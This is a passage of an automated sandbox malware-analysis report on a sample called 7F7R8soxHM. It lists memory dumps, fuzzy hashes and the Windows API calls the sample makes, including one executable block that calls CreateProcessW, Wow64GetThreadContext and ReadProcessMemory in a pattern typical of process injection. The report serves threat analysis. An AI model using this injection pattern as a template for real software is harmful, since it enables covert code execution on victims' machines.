                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                      • String ID:
                      • API String ID: 3902256705-0
                      • Opcode ID: c92bf2364bade78767d8f6adc1f137cff6add453e628396a212fb7d0f812b1ce
                      • Instruction ID: cfe3a3ba8cf99ccf7c1fb75f31f866d39b1546c43659b8b1f63878d7d34dd948
                      • Opcode Fuzzy Hash: c92bf2364bade78767d8f6adc1f137cff6add453e628396a212fb7d0f812b1ce
                      • Instruction Fuzzy Hash: 77F0283550031EA6CF20BA98ED059EF77EC9F01390F10106AFC04F6192DFB28E80A2E0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __lock_file_memset
                      • String ID:
                      • API String ID: 26237723-0
                      • Opcode ID: b342a8e1e05a77a1647171376c08fc31bc278b2e0a7b35e8f06c9e281a6adcb7
                      • Instruction ID: 5a989967c922cb889a6a98b5823118104e84c1351651d5fbc07c68156e608a5b
                      • Opcode Fuzzy Hash: b342a8e1e05a77a1647171376c08fc31bc278b2e0a7b35e8f06c9e281a6adcb7
                      • Instruction Fuzzy Hash: F6018472800608EBCF23AF699D0659E7BA1AF41360F145229B8147A1A1DB31CA21DB91
                      APIs
                        • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                      • __lock_file.LIBCMT ref: 00E9561B
                        • Part of subcall function 00E96E4E: __lock.LIBCMT ref: 00E96E71
                      • __fclose_nolock.LIBCMT ref: 00E95626
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                      • String ID:
                      • API String ID: 2800547568-0
                      • Opcode ID: 3dd4633027ad274911521c9632817217baae444f1661060d5b413e92f4d98057
                      • Instruction ID: 32a3e016f4c71802da3bdef7ed6246ef2bd2098efdab606422e7a9984d23c3a5
                      • Opcode Fuzzy Hash: 3dd4633027ad274911521c9632817217baae444f1661060d5b413e92f4d98057
                      • Instruction Fuzzy Hash: 16F02472900B04DADF22BF3588027AE7BE02F01334F55A209E410BB1D2CF7C8A019B41
                      APIs
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00E7558F,?,?,?,?,?), ref: 00E781DA
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00E7558F,?,?,?,?,?), ref: 00E7820D
                        • Part of subcall function 00E778AD: _memmove.LIBCMT ref: 00E778E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$_memmove
                      • String ID:
                      • API String ID: 3033907384-0
                      • Opcode ID: 2f2efda31bc3b227c7d379683eb01adefcb174e616a8cd142c5cc7b0473f5706
                      • Instruction ID: 9e8bf836a0c204c130724ff687d32d037776984393c0089459d30f399180cbac
                      • Opcode Fuzzy Hash: 2f2efda31bc3b227c7d379683eb01adefcb174e616a8cd142c5cc7b0473f5706
                      • Instruction Fuzzy Hash: 9301A231241504BFEB246A25ED4AF7B3B9CEF85760F10802AFD09ED191DE219940D671
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01711B2D
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01711B51
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01711B73
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                      • Instruction ID: 21de51493f99c25d8aeecd31017c6ac0c5fcab4f12fd9daa389ab5929c1df4b9
                      • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                      • Instruction Fuzzy Hash: 2A12ED24E24658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A4E77A4F81CB5A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bd0953d7cc5cfb3aea06393cd505b51d4778c52edd74eaaae276dc744af2edb1
                      • Instruction ID: ab8c6b607f23b4a8ffce0924ad6568fea5e8c9b2d04a91aaea1b7cdf9141a8df
                      • Opcode Fuzzy Hash: bd0953d7cc5cfb3aea06393cd505b51d4778c52edd74eaaae276dc744af2edb1
                      • Instruction Fuzzy Hash: 04518F35700604AFCF14EB54C995EAE77E6AF85314F14A0A8FA0EBB392DA34ED01CB55
                      APIs
                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E75CF6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: f1c4287dc4003043d0ab1da7f10398cbc2d2cb44ac53708e3c4960a38ee3a463
                      • Instruction ID: 09255e6e3091b57731fb6802bf6c21c0bd0fdc921ec687356990533f7020293a
                      • Opcode Fuzzy Hash: f1c4287dc4003043d0ab1da7f10398cbc2d2cb44ac53708e3c4960a38ee3a463
                      • Instruction Fuzzy Hash: 18314932A00B19ABCB18CF29C484AADF7B5FF48314F15C629E819A3710D7B1B960DB90
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: c7bcacbdbdb28e4723b68ffa3e14167ced49b4217adf4a3463555df6909b5d1d
                      • Instruction ID: c94a98bea3581839dd18531494f0bc0959d7101d56ddbee91436a4b2018593a0
                      • Opcode Fuzzy Hash: c7bcacbdbdb28e4723b68ffa3e14167ced49b4217adf4a3463555df6909b5d1d
                      • Instruction Fuzzy Hash: CA410774508341CFDB24DF14C484B5ABBE0BF85358F1999ACE9996B362D332F885CB52
                      APIs
                        • Part of subcall function 00E74D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E74D4D
                        • Part of subcall function 00E9548B: __wfsopen.LIBCMT ref: 00E95496
                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74F6F
                        • Part of subcall function 00E74CC8: FreeLibrary.KERNEL32(00000000), ref: 00E74D02
                        • Part of subcall function 00E74DD0: _memmove.LIBCMT ref: 00E74E1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Library$Free$Load__wfsopen_memmove
                      • String ID:
                      • API String ID: 1396898556-0
                      • Opcode ID: e2e94e81146c24141cd9dd8cb588b1acdfb6b76f30b331486fedbd8190748683
                      • Instruction ID: 3d8b6a5663e4efa2aa43bbbfceb26ed6159bccb6ecd60eeb0597d3d03e53e6ef
                      • Opcode Fuzzy Hash: e2e94e81146c24141cd9dd8cb588b1acdfb6b76f30b331486fedbd8190748683
                      • Instruction Fuzzy Hash: 3611C472700209AADB15EF70CC02FAE77E49F45700F14E429F546B61C1DB719A059B90
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 1e630042cbdb9914b8d71d2b15c16dc15b9bc031f773ad2596e2ebb74916acc8
                      • Instruction ID: 1e4622fdc37779810e8018108ac5d70c19726d531e84fdf7ff353099ba494efc
                      • Opcode Fuzzy Hash: 1e630042cbdb9914b8d71d2b15c16dc15b9bc031f773ad2596e2ebb74916acc8
                      • Instruction Fuzzy Hash: 2F2113B4508341CFCB24DF64C444A5BBBE0BF84348F09996CE99A67762D732F849CB52
                      APIs
                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E75807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E75D76
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 6d6e646af9b9b77e3593da603413cca17000d2cd4998650e4065e0a2d5af79a4
                      • Instruction ID: a21530613c88f9a514b54924e333da7476d72007981621df44b0a4e3c64c01cb
                      • Opcode Fuzzy Hash: 6d6e646af9b9b77e3593da603413cca17000d2cd4998650e4065e0a2d5af79a4
                      • Instruction Fuzzy Hash: 5A112532200B059FD3308F55C888B63B7E9EF45764F10C92EE6AA96A50D7B0E945CB60
                      APIs
                      • __lock_file.LIBCMT ref: 00E94AD6
                        • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2597487223-0
                      • Opcode ID: 9fba02d1b84cc368069aea92dfa1dda3df4449131385717917c189043a30db28
                      • Instruction ID: e78037e4e789ea2182143cb7fa5c084431ebd2adcab8ccf1bcb0038b078886f0
                      • Opcode Fuzzy Hash: 9fba02d1b84cc368069aea92dfa1dda3df4449131385717917c189043a30db28
                      • Instruction Fuzzy Hash: 1DF0A4B19402099BDF61AF748C06BDE37E1AF0132AF086514B814BA1E1EBB88A52DF51
                      APIs
                      • FreeLibrary.KERNEL32(?,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74FDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: b294d6862ad0c0b2e5808129d0695e1a2eb6432878c8a89fb199236dbcb90810
                      • Instruction ID: 7b3db36e41aaeab9d4ea69a3579f2f691ab680a8c0df2f343b44eca3c42431de
                      • Opcode Fuzzy Hash: b294d6862ad0c0b2e5808129d0695e1a2eb6432878c8a89fb199236dbcb90810
                      • Instruction Fuzzy Hash: 66F039B1205712CFCB389F64E494862BBE1BF04329321EA3EE1DAA2651C731A844DF40
                      APIs
                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E909F4
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: LongNamePath_memmove
                      • String ID:
                      • API String ID: 2514874351-0
                      • Opcode ID: 43553b4b060b2ba0e5cd99e9bd72fc94645f55e339ec4d888cb8bdc756d02bfc
                      • Instruction ID: ae2c85085dc7bba4fca82fecc295e7b67ddcecceb8d6c9092b2a81cd7ccddea3
                      • Opcode Fuzzy Hash: 43553b4b060b2ba0e5cd99e9bd72fc94645f55e339ec4d888cb8bdc756d02bfc
                      • Instruction Fuzzy Hash: A8E086369042285BD720D6989C05FFA77EDDFC9690F0541B5FD4CE7214D960AC818690
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __fread_nolock
                      • String ID:
                      • API String ID: 2638373210-0
                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                      • Instruction ID: 0ac1b1bcc76d01ab2ba5355add70e9adab1e813c3519ccfe3e99af4777312635
                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                      • Instruction Fuzzy Hash: 81E092B1204B405FDB398A24DC107E373E0EB06319F00081DF29A93342EB6278428759
                      APIs
                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EAE16B,?,?,00000000), ref: 00E75DBF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: 6f166641d2e1311546a56d9dc16c2c1400a59593c15a7347f752ab0a8117a440
                      • Instruction ID: 77e83cb11b245ce01c6f46c0f5ae35bbaaadbd5e1c0e2734ee403b3d09983ee0
                      • Opcode Fuzzy Hash: 6f166641d2e1311546a56d9dc16c2c1400a59593c15a7347f752ab0a8117a440
                      • Instruction Fuzzy Hash: FBD0C77464020CBFE710DB81DC46FAD777CDB45710F100294FD0466390D6B27D548795
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __wfsopen
                      • String ID:
                      • API String ID: 197181222-0
                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                      • Instruction ID: 6b5f23f48cc1618d68bbb027b6ff49d513f4902ed6f7425cab236442077d6d80
                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                      • Instruction Fuzzy Hash: E2B0927684020C77DE422E82EC02A593B599B40678F808020FB1C28162A673A6A09689
                      APIs
                      • GetLastError.KERNEL32(00000002,00000000), ref: 00EDD46A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorLast
                      • String ID:
                      • API String ID: 1452528299-0
                      • Opcode ID: 9912fc62e9b9703ee1cba217e467deb4e4d01a0fa2d799552a20e57a2f819647
                      • Instruction ID: 87b735159eb3ccbd777c41a91e4f49c1440187197139350bf7f679fc5a1a77ab
                      • Opcode Fuzzy Hash: 9912fc62e9b9703ee1cba217e467deb4e4d01a0fa2d799552a20e57a2f819647
                      • Instruction Fuzzy Hash: EC7187316083018FC714EF24D891A6EB7E4EF88314F04556EF59AAB392DB70ED45CB52
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: a9baceed18c1be8a8783994f2eeb7f6230cdae3ba21416acedd77025cc405ae3
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: 3331C471A00105DFCF18DF58D4809A9F7A6FF59304BA4AAA5E909EB651D731EEC1CBC0
                      APIs
                      • Sleep.KERNELBASE(000001F4), ref: 01712311
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                      • Instruction ID: 227e751013742c831fcbd4d00930e85e96d2a23df95ea0770d70542fab817d76
                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                      • Instruction Fuzzy Hash: 05E09A7494010DAFDB00EFA8D54969E7BB4EF04301F1005A1FD0596681DA309A548A62
                      APIs
                      • Sleep.KERNELBASE(000001F4), ref: 01712311
                      Memory Dump Source
                      • Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction ID: e47a5f3e6b1fa288be46f99e9e0743d9621c03cf621822ad238a14d89bbf1177
                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction Fuzzy Hash: ACE0E67494010DDFDB00EFF8D54969E7FB4EF04301F100561FD01D2281D6309D508A62
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EFCE50
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFCE91
